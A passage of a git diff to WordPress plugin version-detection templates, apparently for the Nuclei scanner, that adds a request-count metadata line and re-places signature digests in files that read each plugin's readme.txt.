4a0a0047304502201ebcad1f27a3d493e1a4e4df3feeef3387ca7b96687b4537f60ac18060c0caf3022100ead072da01ed0bb545a105fcac8ca1321637aa3240feed6b596708c9d729f7a2:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 9201e7f386..d05d20c7b1 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: + max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/loginizer/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205b8059573901b2423f6e28a4343466892956194f967e6bfe092bd3a250e22a13022100cddd413ea12ebf4c620d295954f3126a86eee7edcff3cf8fd31a2f0ba92b0a05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502205b8059573901b2423f6e28a4343466892956194f967e6bfe092bd3a250e22a13022100cddd413ea12ebf4c620d295954f3126a86eee7edcff3cf8fd31a2f0ba92b0a05:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 90ddebf357..16e8952295 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/mailchimp-for-woocommerce/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c4434653fec3122e237f6655138067ca66f716174faeb43190f1861be9214c8d02201d3cf5555f209045e57e08fbd49fe0d85ebb04206e3afbd1d24c7ec5ef846b98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100c4434653fec3122e237f6655138067ca66f716174faeb43190f1861be9214c8d02201d3cf5555f209045e57e08fbd49fe0d85ebb04206e3afbd1d24c7ec5ef846b98:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index dd90a11b39..539fc850bc 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/mailchimp-for-wp/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008f4ed59f155a0dfddcfb8e4eea942e24b7027f1f1d53181c6306d235a552c4ea022009391d5f9d923ff5981e9aa24c7528af370e0e4f04e0e63b8becaa23d553357a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221008f4ed59f155a0dfddcfb8e4eea942e24b7027f1f1d53181c6306d235a552c4ea022009391d5f9d923ff5981e9aa24c7528af370e0e4f04e0e63b8becaa23d553357a:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 5d90258369..4727acc26f 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: + max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/mailpoet/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a9cd128b85067a0d6aa2d2e725c96b774f062760802ddb24e2a81a5b5123b4bd02201badc787e10865893db558855637ee50ed9d7511188080f0d27b0ac698705ee7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a9cd128b85067a0d6aa2d2e725c96b774f062760802ddb24e2a81a5b5123b4bd02201badc787e10865893db558855637ee50ed9d7511188080f0d27b0ac698705ee7:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 33727aed9f..141026b8d2 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: + max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/maintenance/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b5307d57967a09160689ed28d73191f5582f31e8bee0651ad6a9790c53aeef9e0220206459e9faa433275889fe7e057e5328309b5a348a92a4a157447cfe3d9cd636:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100b5307d57967a09160689ed28d73191f5582f31e8bee0651ad6a9790c53aeef9e0220206459e9faa433275889fe7e057e5328309b5a348a92a4a157447cfe3d9cd636:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 9d294fee10..bcebb3967a 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: + max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/mainwp-child/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203c347b7750a618aa9a1561fb5451fed2c412845e0634fab12a7aa4cff8d8f55202204b8cc7525ea17e8cd5f2a98d19143a9a84844c9043a43f293535183d4e8dc712:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402203c347b7750a618aa9a1561fb5451fed2c412845e0634fab12a7aa4cff8d8f55202204b8cc7525ea17e8cd5f2a98d19143a9a84844c9043a43f293535183d4e8dc712:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 0a9870129a..fdd8356271 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: + max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/malcare-security/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210084922acc5025100fb11fa6053f33270a1ca6e8b32ddad49864a2eb2efc6fc2f6022061e6474fecf2cde65f7a0bf1fb5fdc464fb30b915fcaa6c01e3487dda0aa5e90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502210084922acc5025100fb11fa6053f33270a1ca6e8b32ddad49864a2eb2efc6fc2f6022061e6474fecf2cde65f7a0bf1fb5fdc464fb30b915fcaa6c01e3487dda0aa5e90:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index baf86a5b17..de03e2579d 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: + max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/megamenu/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022032a68524a4e9bf06a7a6b120b4a7a86995205fd34176e60caadfe8cfcc98016d0220667b16d29b09e8a8dc77981370f471e5a7cff9f58e9a5b5eb3fe76e70fff7dbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022032a68524a4e9bf06a7a6b120b4a7a86995205fd34176e60caadfe8cfcc98016d0220667b16d29b09e8a8dc77981370f471e5a7cff9f58e9a5b5eb3fe76e70fff7dbd:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7adb50ac95..e8f6cc5185 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: + max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/members/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206fcee3416bdbd6348cd3a0860b4259838fa8da84de9bf94865140f5809024eff02205800cfdc47d50b1210141882b4ca6b6c51592c2de1dec061c7a01b0c091ef05c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402206fcee3416bdbd6348cd3a0860b4259838fa8da84de9bf94865140f5809024eff02205800cfdc47d50b1210141882b4ca6b6c51592c2de1dec061c7a01b0c091ef05c:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index a1d80ae053..869a3981da 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: + max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/meta-box/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022044318c7e25980d3fef802f78e44c57d962ed967bfc2ecb1f2248b19afb8889d7022100c2b355d69b007a8d39182a42cfca66c0de9f98620ea2e6ca0f522d0c6c4c8b53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022044318c7e25980d3fef802f78e44c57d962ed967bfc2ecb1f2248b19afb8889d7022100c2b355d69b007a8d39182a42cfca66c0de9f98620ea2e6ca0f522d0c6c4c8b53:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 4376d7d492..4868738110 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/metform/ metadata: + max-request: 1 plugin_namespace: metform wpscan: https://wpscan.com/plugin/metform tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/metform/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022002151935b96398d2fa2b3dddad288158ae80db0d62a8338651b8e6ccf011a17d02206fe03cfa36ce322e0fabe7903f5f92aaf6f71b7cb224b7e7802cc4195bf236ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022002151935b96398d2fa2b3dddad288158ae80db0d62a8338651b8e6ccf011a17d02206fe03cfa36ce322e0fabe7903f5f92aaf6f71b7cb224b7e7802cc4195bf236ec:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 3301382961..08ccf10367 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: + max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/ml-slider/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207972c8ddc1644b9f16bc70c377a3b55583d56c4ed8bd979b45cf56b9fa9d8e280220795eefbad9b2418e5b99a92e7932e449f10efe9f087990a1cecbe7ba991b68eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402207972c8ddc1644b9f16bc70c377a3b55583d56c4ed8bd979b45cf56b9fa9d8e280220795eefbad9b2418e5b99a92e7932e449f10efe9f087990a1cecbe7ba991b68eb:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index eab7b4d592..b482cd882e 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: + max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/newsletter/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220252dd3483e61a094c11173b20ae7bc9f8fc9ffd1ce05da27ea890f87429d9016022100e16a699ea535c800ac7ab4864b09632328a1ef44f5a158989124059132625083:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220252dd3483e61a094c11173b20ae7bc9f8fc9ffd1ce05da27ea890f87429d9016022100e16a699ea535c800ac7ab4864b09632328a1ef44f5a158989124059132625083:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 0419c64991..869612262e 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: + max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/nextend-facebook-connect/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202c0fe31e68c4d544d3a88cb236d8151a509df4e5b374042f0c12e13fae6ae115022100bfee02613be8bd7ff8b2711a8b417108b318849f6a5fc0340bf13bb0459c9656:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502202c0fe31e68c4d544d3a88cb236d8151a509df4e5b374042f0c12e13fae6ae115022100bfee02613be8bd7ff8b2711a8b417108b318849f6a5fc0340bf13bb0459c9656:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 7f09649013..4bfb8730f8 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: + max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/nextgen-gallery/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a31b60eb96d14c10b3b44cfecb55daf5d59b4147bc38c349cba90359726a63b902202e793cb717311b3eee336c7a486e0c3ee1b583758b2fde6bb5a23be09e3314b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a31b60eb96d14c10b3b44cfecb55daf5d59b4147bc38c349cba90359726a63b902202e793cb717311b3eee336c7a486e0c3ee1b583758b2fde6bb5a23be09e3314b4:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index f00ae0163a..694281fb2f 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: + max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/ninja-forms/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220070fa26248b89ee6d865f6199747a2db243ba9d686eae698f3127f8640f19c030220313a14034ceb0871fac0c3ea94b0bc58155158b29d4c854d3c36d26e98b407ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220070fa26248b89ee6d865f6199747a2db243ba9d686eae698f3127f8640f19c030220313a14034ceb0871fac0c3ea94b0bc58155158b29d4c854d3c36d26e98b407ec:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 1638f6b641..a6e62aba64 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: + max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/ocean-extra/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c2d1574b3b991265375f4cfaa5b3aeb33eb8886fa0b5785d80990016b0259e52022100935a30611562ace82e24373d41abb181cdc46accfc76eb690aeb232a8865197b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c2d1574b3b991265375f4cfaa5b3aeb33eb8886fa0b5785d80990016b0259e52022100935a30611562ace82e24373d41abb181cdc46accfc76eb690aeb232a8865197b:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index ab8ca2ad80..876051899e 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: + max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/official-facebook-pixel/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207bd7561508ec5dd8e7af0c32b0bb5982d0f05c21165e3c42cfeccd33fff1df8a022063dd1c3dbeee75ec7ea71c6bb1b22fa17a881b110e3bec33631ddbf9ea7bf2a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402207bd7561508ec5dd8e7af0c32b0bb5982d0f05c21165e3c42cfeccd33fff1df8a022063dd1c3dbeee75ec7ea71c6bb1b22fa17a881b110e3bec33631ddbf9ea7bf2a6:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 48303df5d7..ac4c41fbff 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: + max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/one-click-demo-import/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d3a3c4f4ca39eaa531ed952e3288af1cd0a48580fc66b5b148fcd29da0a46ce902210096a94f1c35896be670b5a1017aa1e26f7348983f9ec585805f54fd1a50bb6c6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d3a3c4f4ca39eaa531ed952e3288af1cd0a48580fc66b5b148fcd29da0a46ce902210096a94f1c35896be670b5a1017aa1e26f7348983f9ec585805f54fd1a50bb6c6b:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 361e620bb7..bed1bf7236 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: + max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/optinmonster/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220641bd0a6a956252dee349efca88a03a3a302a887e1c989c069963cf02e56541b022048785c23915123065d91a303744fde092e7ca15ba209fb7a366d81375b4c624c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220641bd0a6a956252dee349efca88a03a3a302a887e1c989c069963cf02e56541b022048785c23915123065d91a303744fde092e7ca15ba209fb7a366d81375b4c624c:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index a6ca6af31f..3dbb49a52c 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: + max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/otter-blocks/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022051f7fa02a65e11935f9b0bb86f2691eae09a286755698df122228ebb0458d9ec022100aa040409d42c0e3510a4478e83ed849f43bcffb41aac4a8da9423067a68078fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022051f7fa02a65e11935f9b0bb86f2691eae09a286755698df122228ebb0458d9ec022100aa040409d42c0e3510a4478e83ed849f43bcffb41aac4a8da9423067a68078fd:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 1430a92bcd..14145ebf6f 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: + max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/password-protected/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202637e152b2b8ff0fdab13696aeac93e9a384f4184651f2b9ecaf9c075366cd4902203944b0c5009f24d18bf472f7856eb506d2f10961bf7ba65bbedde5751d36f10a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402202637e152b2b8ff0fdab13696aeac93e9a384f4184651f2b9ecaf9c075366cd4902203944b0c5009f24d18bf472f7856eb506d2f10961bf7ba65bbedde5751d36f10a:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 032c4ac8e4..9c8f5ddd5f 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: + max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/pdf-embedder/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b0c2d7207877794b01e622e2b1c53e79ca2e69f27e96a8cf996d219ca34f54e3022100d96a997255400b928da5ca29d83345e06596732aa3e56d4572dd689ea8b01267:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100b0c2d7207877794b01e622e2b1c53e79ca2e69f27e96a8cf996d219ca34f54e3022100d96a997255400b928da5ca29d83345e06596732aa3e56d4572dd689ea8b01267:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 35eb708bf9..73826228d7 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/pinterest-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: pinterest-for-woocommerce wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/pinterest-for-woocommerce/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fe3a81b983858e6aa75f53d82b8262b6a1ca56347315d442eb72327e93fc5c0002203e27bb56065acd1738b4b7b60f5947128c55183dfed9cd3ba75c0dc4f4264a34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100fe3a81b983858e6aa75f53d82b8262b6a1ca56347315d442eb72327e93fc5c0002203e27bb56065acd1738b4b7b60f5947128c55183dfed9cd3ba75c0dc4f4264a34:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 8b6403f270..683b4a253c 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: + max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/pixelyoursite/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202aa116910d72b6e918a833982ced9683b45b8d198019a69d1155873cabbcf6bf02203ada66e11d9884855d32d4c5048574c3df74de9cf1961024a801647886728c9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402202aa116910d72b6e918a833982ced9683b45b8d198019a69d1155873cabbcf6bf02203ada66e11d9884855d32d4c5048574c3df74de9cf1961024a801647886728c9e:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/polylang.yaml 